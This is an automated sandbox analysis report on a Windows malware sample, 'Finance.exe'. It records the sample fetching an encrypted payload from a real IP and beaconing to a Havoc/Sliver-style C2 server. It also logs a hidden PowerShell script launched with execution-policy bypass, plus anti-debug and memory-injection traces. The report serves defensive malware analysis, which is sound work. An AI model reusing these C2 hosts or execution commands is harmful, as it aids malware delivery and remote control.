Summary | ZeroBOX

Finance.exe

Generic Malware Malicious Library Antivirus UPX .NET DLL AntiDebug PE64 DLL PE32 PE File AntiVM
Category: FILE
Machine: s1_win7_x6401
Started: April 29, 2025, 10:23 a.m.
Completed: April 29, 2025, 10:29 a.m.
Size 117.0KB
Type PE32+ executable (GUI) x86-64, for MS Windows
MD5 70dbf2129ad10943c505dfc8f75a0e12
SHA256 6f783fddc42681870d2a3184acff7a68833c212b7e8e34c5b92aee88f16d66f7
CRC32 E91043BE
ssdeep 3072:Jpvb7RV/8hhb3dLUK94IgqHniOSyaZoc7QNPnP9TBfWSE6j:z9VkhhrdYK94IgqHniOSyaZoc7QNPnPD
Yara
  • PE_Header_Zero - PE File Signature
  • IsPE64 - (no description)
  • Malicious_Library_Zero - Malicious_Library
  • UPX_Zero - UPX packed file

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
212.227.245.12 Active Moloch
85.215.173.244 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 85.215.173.244:443 -> 192.168.56.101:49187 2037697 ET ATTACK_RESPONSE Havoc/Sliver Framework TLS Certificate Observed A Network Trojan was detected

Suricata TLS

Flow: TLSv1 192.168.56.101:49187 -> 85.215.173.244:443
Issuer: C=US, ST=Connecticut, L=Norwalk, unknown=, unknown=2556, O=Synergy Co, CN=85.215.173.244
Subject: C=US, ST=Connecticut, L=Norwalk, unknown=, unknown=2556, O=Synergy Co, CN=85.215.173.244
Fingerprint: 6c:c5:54:c3:e2:0a:00:ac:3a:29:5a:b9:12:8c:c5:5c:56:88:dc:20

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000000046df40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5967e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5967e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5967e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5967e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5967e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b596310
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b596310
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b596310
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b596310
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b596d20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b596d20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b596d20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b596a10
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b596a10
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b596a10
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b597180
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b597180
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b597180
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b597180
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b597180
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b597180
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b597180
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b597180
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5971f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5971f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5971f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b596a10
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b596a10
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b596b60
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b596b60
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b597260
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b597260
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b597260
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000000046de60
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000000046de60
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000000046e1e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000000046e1e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5bdf80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5bdf80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000291620
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000000029d530
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002a8c40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002b53c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002a8c40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002a8c40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002a8c40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002b5610
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002ba0a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002ba0a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
section .code
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://212.227.245.12/c.aes
suspicious_features POST method with no referer header, Connection to IP address suspicious_request POST https://85.215.173.244/
request GET http://212.227.245.12/c.aes
request POST https://85.215.173.244/
request POST https://85.215.173.244/
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2680
region_size: 1572864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002aa0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2680
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002ba0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3ba1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e1e000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e1e000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e1f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e1f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e1f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e1f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e1f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e1f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e1f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e1f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e20000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e20000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e20000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e20000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e20000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3e1e000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00042000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2680
region_size: 589824
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2680
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000fa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00032000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2680
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002ba2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2680
region_size: 12288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002ba4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0010a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00043000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00044000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00132000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0010d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000fb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00045000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00180000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00033000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00046000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00133000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000fc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000f3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0003a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2680
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00181000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2680
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002ba7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\F30A.tmp\F31B.tmp\F31C.ps1
file c:\Users\test22\AppData\Local\Temp\dsbups9j.dll
file c:\Users\test22\AppData\Local\Temp\wb0pvs3w.dll
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell –NoProfile -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Local\Temp\F30A.tmp\F31B.tmp\F31C.ps1
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" –NoProfile -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Local\Temp\F30A.tmp\F31B.tmp\F31C.ps1
file C:\Users\test22\AppData\Local\Temp\dsbups9j.dll
file C:\Users\test22\AppData\Local\Temp\wb0pvs3w.dll
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: –NoProfile -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Local\Temp\F30A.tmp\F31B.tmp\F31C.ps1
filepath: powershell
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 98304
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x000000001cab0000
process_handle: 0xffffffffffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
section .rsrc (virtual_address 0x00020000, virtual_size 0x00000b54, size_of_data 0x00000c00, entropy 7.229365069526266) entropy 7.22936506953 description A section with a high entropy has been found
Data received HTTP/1.1 200 OK Date: Tue, 29 Apr 2025 01:28:18 GMT Server: Apache/2.4.63 (Debian) Last-Modified: Sun, 27 Apr 2025 17:34:20 GMT ETag: "19600-633c5fa3cbc8b" Accept-Ranges: bytes Content-Length: 103936 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive
Data sent GET /c.aes HTTP/1.1 Host: 212.227.245.12 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
• DebuggerCheck__GlobalFlags - (no description)
• DebuggerCheck__QueryInfo - (no description)
• DebuggerHiding__Thread - (no description)
• DebuggerHiding__Active - (no description)
• ThreadControl__Context - (no description)
• SEH__vectored - (no description)
• anti_dbg - Checks if being debugged
• disable_dep - Bypass DEP
cmdline "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\wb0pvs3w.cmdline"
cmdline "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\dsbups9j.cmdline"
host 212.227.245.12
host 85.215.173.244
file C:\Users\test22\AppData\Local\Temp\RESB64C.tmp
file c:\Users\test22\AppData\Local\Temp\CSCB5BE.tmp
Time & API Arguments Status Return Repeated

send

buffer: GET /c.aes HTTP/1.1 Host: 212.227.245.12 Connection: Keep-Alive
socket: 1252
sent: 69
1 69 0

WSASend

buffer: ZVh*>¶%BiÙx–^‚÷T•|s}Ýû¿Å4z18H/5 ÀÀÀ À 28ÿ  
socket: 1292
0 0

WSASend

buffer: FBA•Œ½~%ÜNðu&ìu/“©©-¢KÜW¸jñ F[Àvõ—+T1P)–&øß/Ÿuüzºø8=æi^ì 9Œf3Cè0ùK^‚¡Ð‰üó™ ±²x"ú(“éZ X¿ÖëOq¿“N:kˆ·#HݜJ±úsUI
socket: 1292
0 0

WSASend

buffer: 0óØL¬ÿ¶¾x˜U²ŸhnÀ¼ëäcMvl¹n™nÌ;~ô¬> àn§Dób¹ZèFNð•A+„yV\<ä«eû÷Å'륦5pùÉ¥xÒTÈ,ë©§ê ¥ù³^運#l»<Å/a³Ji³˜#qā·Ln¹4dNT#-Ç:Lék㛠f²«Å¢‘Rþyº òIÐ?v[!_c1Âën²¨6„¯ÊёÓȾká¢ôÉ­w¹RÓlt ƒ>×LàWÓð¥K+’Äøž›S2h¹²¢^Y}ݱùt ^…üK^fmyGÄÊI­oÔ ™Î>–›¨ä™3Œ­™ëܖn¯z*ãàmïβ7Khã²Ïßä5Xy@D8lhêø^§Ûkņ]âɨ
socket: 1292
0 0

WSASend

